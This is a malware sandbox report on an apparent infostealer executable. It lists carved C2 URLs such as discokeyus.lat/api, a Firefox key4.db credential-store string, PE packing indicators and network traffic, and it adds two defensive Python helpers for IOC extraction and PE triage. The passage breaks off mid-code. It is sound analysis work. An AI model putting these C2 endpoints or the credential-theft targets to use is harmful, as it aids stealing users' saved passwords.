Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2439195494.00000000019EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat//
Source: 0WO49yZcDA.exe, 00000000.00000002.2515977981.0000000006137000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/2
Source: 0WO49yZcDA.exe, 00000000.00000003.2385788262.000000000611F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/F
Source: 0WO49yZcDA.exe, 00000000.00000003.2480452925.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiTEZG2
Source: 0WO49yZcDA.exe, 00000000.00000002.2515911924.00000000060A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiiL
Source: 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apilv
Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/c
Source: 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/ddryb
Source: 0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2414252491.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/nlTW
Source: 0WO49yZcDA.exe, 00000000.00000003.2462352801.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2480307316.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2467059353.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/qMZ1L
Source: 0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2438974726.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apial
Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apifi
Source: 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/api
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49732 version: TLS 1.2
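The C2 strings above were carved from heap memory, so the same endpoint appears several times with different trailing bytes ("/apial", "/apifi", "/apiv6zchhhv.default-release/key4.dbPK"): the URL is NUL-terminated in the config but the dump continues into whatever sat next to it in memory. The following helper, an added example and not part of the Joe Sandbox report or the sample, carves URLs out of such strings, splits two URLs that were written back to back (the duckduckgo favicon string), and collapses the variants onto the canonical endpoint. It assumes the shape visible in this report, an explicit :443 port and an "/api" path, and keeps the raw variants because "/api" followed by more path characters could also be a legitimate endpoint on another sample; the analyst, not the script, decides what goes on a blocklist.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Tempered path class: stop before a second "http(s)://" so two URLs that were
# concatenated in memory (".../favicon.icohttps://...") are carved separately.
URL_RE = re.compile(
    r"https?://(?P<host>[a-z0-9][a-z0-9.-]*\.[a-z]{2,})"
    r"(?::(?P<port>\d{1,5}))?"
    r"(?P<path>(?:(?!https?://)[A-Za-z0-9._~/?=&%+-])*)"
)

# Assumed config shape for this sample: "https://<host>:443/api"; anything after
# "/api" is adjacent heap data carved along with the string, not part of the URL.
C2_PORT = "443"
C2_PATH = "/api"

# Constructed input: the memory strings listed in the report above, plus benign
# browser strings from the same dumps that must not be flagged.
SAMPLE_STRINGS = [
    "https://discokeyus.lat:443/api",
    "https://discokeyus.lat:443/apial",
    "https://discokeyus.lat:443/apifi",
    "https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK",
    "https://grannyejh.lat:443/api",
    "https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=",
    "https://www.mozilla.org/en-US/privacy/firefox/Firefox",
    "https://support.mozilla.org/products/firefoxgro.all",
]


def find_urls(blob: str) -> list[tuple[str, str | None, str]]:
    """Return every (host, port, path) carved out of one memory string."""
    return [(m["host"], m["port"], m["path"] or "/") for m in URL_RE.finditer(blob)]


def normalize_c2(host: str, port: str | None, path: str) -> str | None:
    """Canonical C2 URL if the URL has the config shape, otherwise None."""
    if port != C2_PORT or not path.startswith(C2_PATH):
        return None
    return f"https://{host}:{port}{C2_PATH}"


def extract_c2(strings: list[str]) -> dict[str, set[str]]:
    """Map each canonical C2 URL to the raw variants that were collapsed onto it."""
    found: dict[str, set[str]] = defaultdict(set)
    for s in strings:
        for host, port, path in find_urls(s):
            canonical = normalize_c2(host, port, path)
            if canonical:
                found[canonical].add(f"https://{host}:{port}{path}")
    return dict(found)


if __name__ == "__main__":
    for url, variants in sorted(extract_c2(SAMPLE_STRINGS).items()):
        print(url, "<-", ", ".join(sorted(variants)))
```

Run against the strings above this yields two hosts, discokeyus.lat and grannyejh.lat, each mapped to "https://<host>:443/api"; the Mozilla and DuckDuckGo strings fall through because they have neither the explicit port nor the path.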

                System Summary

Source: 0WO49yZcDA.exe | Static PE information: section name: (blank)
Source: 0WO49yZcDA.exe | Static PE information: section name: .idata
Source: 0WO49yZcDA.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_06139629
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_06139AB9
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_061392D3
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_061394C3
Source: 0WO49yZcDA.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0WO49yZcDA.exe | Static PE information: Section: (blank) ZLIB complexity 0.9974047517123288
Source: 0WO49yZcDA.exe | Static PE information: Section: isktfjdo ZLIB complexity 0.9946853422395677
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0WO49yZcDA.exe, 00000000.00000003.2362985184.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2387838153.00000000060AC000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2387838153.000000000613F000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2363621748.00000000060AE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0WO49yZcDA.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File read: C:\Users\user\Desktop\0WO49yZcDA.exe
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Section loaded: ondemandconnroutehelper.dll
Source: 0WO49yZcDA.exe | Static file information: File size 1870848 > 1048576
Source: 0WO49yZcDA.exe | Static PE information: Raw size of isktfjdo is bigger than: 0x100000 < 0x1a0600

                Data Obfuscation

Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Unpacked PE file: 0.2.0WO49yZcDA.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;isktfjdo:EW;rvricfai:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;isktfjdo:EW;rvricfai:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 0WO49yZcDA.exe | Static PE information: real checksum: 0x1ca473 should be: 0x1c90bc
Source: 0WO49yZcDA.exe | Static PE information: section name: (blank)
Source: 0WO49yZcDA.exe | Static PE information: section name: .idata
Source: 0WO49yZcDA.exe | Static PE information: section name: (blank)
Source: 0WO49yZcDA.exe | Static PE information: section name: isktfjdo
Source: 0WO49yZcDA.exe | Static PE information: section name: rvricfai
Source: 0WO49yZcDA.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0196CB0D pushad ; retf 0_3_0196CB61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0196CB0D pushad ; retf 0_3_0196CB61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0196CB64 pushad ; retf 0_3_0196CB65
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0196CB64 pushad ; retf 0_3_0196CB65
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_019ECF60 push eax; retf 0_3_019ECF61
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0613BA00 pushad ; ret 0_3_0613BA11
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_0613D70C push esi; retf 0_3_0613D70F
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Code function: 0_3_06135C73 push es; iretd 0_3_06135CD1
Source: 0WO49yZcDA.exe | Static PE information: section name: (blank) entropy: 7.977841389176462
Source: 0WO49yZcDA.exe | Static PE information: section name: isktfjdo entropy: 7.954008306742392
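The static indicators in this section (blank and random section names, two sections with entropy close to 8, a section larger than 1 MiB, an entry point in a non-standard section, sections that are writable and executable once unpacked, and a header checksum that does not match the file) are all cheap to check before running anything. The following script is an added example, not code from Joe Sandbox or from the sample: it parses the PE32 section table with nothing but the standard library, computes Shannon entropy and the imagehlp checksum, and reports the same classes of finding. Because the analysed file is not on the page, it builds a small two-section image itself, with a high-entropy RWX section named isktfjdo holding the entry point, to mirror the traits reported above; that constructed image, the 7.5 entropy threshold and the 1 MiB size threshold are the example's own choices.

```python
import math
import struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".pdata", ".tls", ".CRT"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(pe: bytes) -> int:
    """Image checksum as imagehlp computes it: 16-bit one's-complement fold of the whole
    file, skipping the 4-byte CheckSum field itself, plus the file length."""
    skip = struct.unpack_from("<I", pe, 0x3C)[0] + 4 + 20 + 64   # e_lfanew + sig + COFF + field offset
    data, total = pe + b"\0" * (-len(pe) % 4), 0
    for off in range(0, len(data), 4):
        if off != skip:
            total += struct.unpack_from("<I", data, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(pe)


def parse_pe(pe: bytes) -> tuple[int, int, list[dict]]:
    """(entry point RVA, stored checksum, section records) of a PE32 file."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff, sections = e_lfanew + 4, []
    nsec, opt_size = struct.unpack_from("<H", pe, coff + 2)[0], struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry, stored = struct.unpack_from("<I", pe, opt + 16)[0], struct.unpack_from("<I", pe, opt + 64)[0]
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append({"name": pe[off:off + 8].rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "characteristics": struct.unpack_from("<I", pe, off + 36)[0],
                         "data": pe[raw_ptr:raw_ptr + raw_size]})
    return entry, stored, sections


def triage(pe: bytes, entropy_threshold: float = 7.5, big_section: int = 0x100000) -> list[str]:
    """Static findings of the kind listed above: odd section names, packed (high-entropy) or
    oversized sections, RWX sections, an entry point outside .text, a wrong checksum."""
    entry, stored, sections = parse_pe(pe)
    findings, ep_section = [], None
    for s in sections:
        name, chars, ent = s["name"], s["characteristics"], shannon_entropy(s["data"])
        if not name.strip() or name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {name!r}")
        if ent > entropy_threshold:
            findings.append(f"section {name!r} entropy {ent:.2f} above {entropy_threshold}")
        if s["raw_size"] > big_section:
            findings.append(f"section {name!r} raw size 0x{s['raw_size']:x} above 0x{big_section:x}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name!r} is writable and executable")
        if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"]):
            ep_section = name
    if ep_section != ".text":
        findings.append(f"entry point 0x{entry:x} lies in section {ep_section!r}, not .text")
    computed = pe_checksum(pe)
    if stored and stored != computed:            # zero means "not set", usual for unsigned builds
        findings.append(f"checksum mismatch: header 0x{stored:x}, computed 0x{computed:x}")
    return findings


def build_sample_pe(entry_rva: int, stored_checksum: int) -> bytes:
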